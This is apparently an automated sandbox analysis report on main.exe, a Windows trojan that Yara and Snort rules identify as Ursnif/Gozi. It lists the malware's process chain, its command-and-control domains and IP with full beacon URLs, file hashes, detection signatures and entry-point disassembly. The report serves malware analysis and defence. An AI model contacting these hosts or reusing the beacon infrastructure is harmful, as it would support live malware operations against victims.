                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number in parentheses after a technique is the count shown next to it in the report; "-" marks an empty cell):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (2) | Path Interception | Process Injection (11) | Virtualization/Sandbox Evasion (21) | Input Capture (1) | System Time Discovery (1) | Remote Services | Email Collection (1) | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1)
Default Accounts | Command and Scripting Interpreter (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (11) | LSASS Memory | Security Software Discovery (1) | Remote Desktop Protocol | Input Capture (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API (3) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Archive Collected Data (11) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Account Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | File and Directory Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Information Discovery (35) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact
Behavior Graph (ID: 747122, Sample: main.exe, Start date: 16/11/2022, Architecture: WINDOWS, Score: 100)

Processes in the graph:
• main.exe (started from the sample)
• mshta.exe (started; the graph attributes no parent process)
• powershell.exe (started by mshta.exe)
• conhost.exe (started by powershell.exe)

DNS/IP info in the graph:
• lentaphoto.at (no IP shown), resolved by main.exe
• iujdhsndjfks.ru, 134.0.118.203, port 80 (local port 49698), AS-REGRU, Russian Federation, contacted by main.exe

Signatures shown in the graph:
• Snort IDS alert for network traffic
• Malicious sample detected (through community Yara rule)
• Antivirus / Scanner detection for submitted sample
• 3 other signatures
• main.exe: Writes or reads registry keys via WMI
• main.exe: Writes registry values via WMI

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
main.exe | 62% | Virustotal | -
main.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
main.exe | 100% | Joe Sandbox ML | -

Dropped Files
No Antivirus matches

Unpacked PE Files
Source | Detection | Scanner | Label
0.2.main.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.0.main.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.2.main.exe.6d0000.1.unpack | 100% | Avira | HEUR/AGEN.1245293

Domains
Source | Detection | Scanner | Label
iujdhsndjfks.ru | 0% | Virustotal | -
lentaphoto.at | 1% | Virustotal | -

URLs
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://iujdhsndjfks.ru/ | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct | 0% | Avira URL Cloud | safe
http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/ | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct | 0% | Avira URL Cloud | safe
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH | 0% | Avira URL Cloud | safe
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
iujdhsndjfks.ru | 134.0.118.203 | true | true | - | unknown
lentaphoto.at | unknown | unknown | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct | true | Avira URL Cloud: safe | unknown
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct | true | Avira URL Cloud: safe | unknown
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://iujdhsndjfks.ru/ | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/ | main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH | main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
134.0.118.203 | iujdhsndjfks.ru | Russian Federation | 197695 | AS-REGRU | true
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:747122
                          Start date and time:2022-11-16 02:12:09 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 5m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:main.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.winEXE@5/2@3/1
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HDC Information:
                          • Successful, ratio: 45.9% (good quality ratio 44.3%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.8%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                          • Execution Graph export aborted for target mshta.exe, PID 2388 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 2620 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:15:01 | API Interceptor | 17x Sleep call for process: powershell.exe modified
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.5154778279802725
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:main.exe
                          File size:37888
                          MD5:9676298f24c8cdd4b532ac027a00f60e
                          SHA1:8d0bd57712533f1a889627706925c17ed4347ce5
                          SHA256:0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
                          SHA512:525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
                          SSDEEP:768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
                          TLSH:9503E1967C6D152DDFDF82B22B2F618087392331565A50B4737F242F9A43D1B407B263
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
                          Icon Hash:00828e8e8686b000
                          Entrypoint:0x40182f
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:1640d668d1471f340cbe565fe63522f6
                          Instruction
                          push esi
                          xor esi, esi
                          push esi
                          push 00400000h
                          push esi
                          call dword ptr [0040203Ch]
                          mov dword ptr [00403160h], eax
                          cmp eax, esi
                          je 00007F42ECE959C7h
                          push esi
                          call dword ptr [00402008h]
                          mov dword ptr [00403170h], eax
                          call dword ptr [00402044h]
                          call 00007F42ECE955D9h
                          push dword ptr [00403160h]
                          mov esi, eax
                          call dword ptr [00402040h]
                          push esi
                          call dword ptr [00402048h]
                          pop esi
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch
                          push ebx
                          push esi
                          mov esi, eax
                          mov eax, dword ptr [00403180h]
                          mov ecx, dword ptr [esi+3Ch]
                          mov ecx, dword ptr [ecx+esi+50h]
                          lea edx, dword ptr [eax-69B24F45h]
                          not edx
                          lea ecx, dword ptr [ecx+eax-69B24F45h]
                          push edi
                          and ecx, edx
                          lea edx, dword ptr [ebp-08h]
                          push edx
                          lea edx, dword ptr [ebp-04h]
                          push edx
                          add eax, 964DA0FCh
                          push eax
                          push ecx
                          call 00007F42ECE95C2Dh
                          test eax, eax
                          jne 00007F42ECE959FCh
                          mov edi, dword ptr [ebp-04h]
                          push esi
                          push edi
                          call 00007F42ECE95D03h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959D8h
                          mov esi, dword ptr [edi+3Ch]
                          add esi, edi
                          push esi
                          call 00007F42ECE95424h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959C7h
                          push edi
                          mov eax, esi
                          call 00007F42ECE95F04h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959B9h
                          mov esi, dword ptr [esi+28h]
                          push eax
                          push 00000001h
                          add esi, edi
                          push edi
                          call esi
                          test eax, eax
                          jne 00007F42ECE959AAh
                          call dword ptr [0000202Ch]
                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729
                           Name                                  Virtual Address  Virtual Size  Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_IMPORT          0x20e8           0x50          .rdata
                           IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5000           0x10          .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6000           0xd8          .reloc
                           IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0xa8          .rdata
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                           IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                           Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
                           .text  | 0x1000          | 0x1000       | 0x1000   | False    | 0.718017578125     | data      | 6.515539058364033   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                           .rdata | 0x2000          | 0x4c0        | 0x600    | False    | 0.4635416666666667 | data      | 4.488955985688776   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           .data  | 0x3000          | 0x194        | 0x200    | False    | 0.056640625        | data      | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           .bss   | 0x4000          | 0x2dc        | 0x400    | False    | 0.7607421875       | data      | 6.3016514258390215  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           .rsrc  | 0x5000          | 0x10         | 0x200    | False    | 0.02734375         | data      | 0.0                 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           .reloc | 0x6000          | 0x8000       | 0x7200   | False    | 0.9698807565789473 | data      | 7.856350754061323   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           DLL           Imports
                           ntdll.dll     _snwprintf, memset, NtQuerySystemInformation, _aulldiv
                           KERNEL32.dll  GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                           ADVAPI32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorA
                           Timestamp                | Protocol | SID     | Message                                                   | Source Port | Dest Port | Source IP   | Dest IP
                           11/16/22-02:14:48.026105 | TCP      | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49698       | 80        | 192.168.2.3 | 134.0.118.203
                           11/16/22-02:14:48.026105 | TCP      | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49698       | 80        | 192.168.2.3 | 134.0.118.203
                           Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                           Nov 16, 2022 02:13:04.754086018 CET | 59869       | 53        | 192.168.2.3 | 8.8.8.8
                           Nov 16, 2022 02:13:05.118052006 CET | 53          | 59869     | 8.8.8.8     | 192.168.2.3
                           Nov 16, 2022 02:14:25.358735085 CET | 57840       | 53        | 192.168.2.3 | 8.8.8.8
                           Nov 16, 2022 02:14:25.378199100 CET | 53          | 57840     | 8.8.8.8     | 192.168.2.3
                           Nov 16, 2022 02:15:18.869553089 CET | 57990       | 53        | 192.168.2.3 | 8.8.8.8
                           Nov 16, 2022 02:15:19.235027075 CET | 53          | 57990     | 8.8.8.8     | 192.168.2.3
                           Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name            | Type           | Class       | DNS over HTTPS
                           Nov 16, 2022 02:13:04.754086018 CET | 192.168.2.3 | 8.8.8.8 | 0xbfdf   | Standard query (0) | lentaphoto.at   | A (IP address) | IN (0x0001) | false
                           Nov 16, 2022 02:14:25.358735085 CET | 192.168.2.3 | 8.8.8.8 | 0x8f7    | Standard query (0) | iujdhsndjfks.ru | A (IP address) | IN (0x0001) | false
                           Nov 16, 2022 02:15:18.869553089 CET | 192.168.2.3 | 8.8.8.8 | 0xe6a8   | Standard query (0) | lentaphoto.at   | A (IP address) | IN (0x0001) | false
                           Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code         | Name            | CName | Address       | Type           | Class       | DNS over HTTPS
                           Nov 16, 2022 02:13:05.118052006 CET | 8.8.8.8   | 192.168.2.3 | 0xbfdf   | Server failure (2) | lentaphoto.at   | none  | none          | A (IP address) | IN (0x0001) | false
                           Nov 16, 2022 02:14:25.378199100 CET | 8.8.8.8   | 192.168.2.3 | 0x8f7    | No error (0)       | iujdhsndjfks.ru |       | 134.0.118.203 | A (IP address) | IN (0x0001) | false
                           Nov 16, 2022 02:15:19.235027075 CET | 8.8.8.8   | 192.168.2.3 | 0xe6a8   | Server failure (2) | lentaphoto.at   | none  | none          | A (IP address) | IN (0x0001) | false
                          • iujdhsndjfks.ru


                          Target ID:0
                          Start time:02:13:00
                          Start date:16/11/2022
                          Path:C:\Users\user\Desktop\main.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\main.exe
                          Imagebase:0x400000
                          File size:37888 bytes
                          MD5 hash:9676298F24C8CDD4B532AC027A00F60E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
